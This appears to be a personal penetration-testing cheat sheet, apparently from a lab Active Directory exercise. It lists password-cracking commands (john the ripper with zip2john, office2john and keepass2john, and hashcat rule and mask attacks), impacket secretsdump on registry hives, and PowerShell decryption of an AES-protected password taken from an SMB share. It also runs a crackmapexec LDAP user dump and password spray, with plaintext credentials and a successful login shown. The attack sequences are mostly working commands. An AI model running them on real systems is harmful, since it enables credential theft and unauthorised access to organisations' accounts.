Using john the ripper for cracking the zip passsword.
Commands used:
zip2john backup.zip > hashes
john -wordlist=/usr/share/wordlists/rockyou.txt hashes
office2john login.xlxs >hahses
john -wordlist=/usr/share/wordlists/rockyou.txt hashes
Hashcat with rules
hashcat a.txt /usr/share/seclists/rockyou.txt -r /opt/active_directory/hashcat/rules/d3ad0ne.rule
Impacket
LOCAL
impacket-secretsdump -system systemic.txt -sam samantha.txt -security security.txt LOCAL
AES and Password file
Decrypting Credentials from an SMB Share
While exploring an SMB share, I stumbled upon two intriguing files: aes.key and passwd.txt. Intrigued by their names and potential contents, I decided to investigate further. My first thought was that aes.key could be an encryption key, and passwd.txt likely contained encrypted data, possibly a password. To explore this hypothesis, I used a PowerShell environment on my Commando VM.
I started by loading the content of aes.key into a variable using the command:
$Key = Get-Content -Path C:\Users\jay\Desktop\aes.keyThis command read the contents of the aes.key file and stored it in the $Key variable. Next, I needed to load the encrypted message from the passwd.txt file. I achieved this with the following command:
$EncryptedMessage = Get-Content -Path "C:\Users\jay\Desktop\passwd.txt"With both the key and the encrypted message in hand, I was ready to attempt decryption. PowerShell offers a convenient way to handle encrypted strings through its SecureString object. I used the ConvertTo-SecureString cmdlet, which is designed to convert encrypted data into a SecureString object, using the key I had just loaded. The command was as follows:
$SecureStringPassword = $EncryptedMessage | ConvertTo-SecureString -Key $KeyUpon executing this command, the encrypted message was converted into a SecureString, a special kind of string in PowerShell that is used for handling sensitive information securely.
However, SecureString objects are not immediately readable. To view the decrypted password, I had to convert it back to a plain text string. This is a sensitive operation since it involves handling a password in an unencrypted form. To do this, I used the .NET class System.Runtime.InteropServices.Marshal which provides methods for dealing with unmanaged code. The commands were:
$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($SecureStringPassword)
$PlainTextPassword = [System.Runtime.InteropServices.Marshal]::PtrToStringBSTR($Ptr)
[System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($Ptr)These commands converted the SecureString to a plain text string and then freed the allocated memory to maintain security. Finally, I displayed the decrypted password using:
echo $PlainTextPasswordThe output revealed the decrypted password: to7oxaith2Vie9. This successful decryption indicated that the files I found were indeed a key and an encrypted password, and I had managed to uncover the latter using PowerShell’s capabilities.
Preparing for password spray
cme ldap 10.9.10.10 -u 'george.wirth' -p 'v765#QLm^8' -d core.cyber.local --users >> users.txt
awk '/LDAP/{print $5}' users.txt > only_users.txt
Password Spray
cme ldap 10.9.10.10 -u only_users.txt -p 'to7oxaith2Vie9'
LDAP 10.9.10.10 389 CYDC [+] cyber.local\Robert.Ortiz:to7oxaith2Vie9
Keypass kdbx
cp data.kdbx try.kdbx
keepass2john try.kdbx > try.txt
john --wordlist=/usr/share/wordlists/rockyou.txt try.txt
When we know the initial few characters of the password used hashcat.
remove the initial same and start with $keepass$ for the hash.
if we have initial password like UA7cpa[#1!_*ZX?a here we were not sure about the last character so I added ?a which is all ascii characters.
we save this like pass.txt
hashcat -a 3 -m 13400 try2.txt pass.txt
`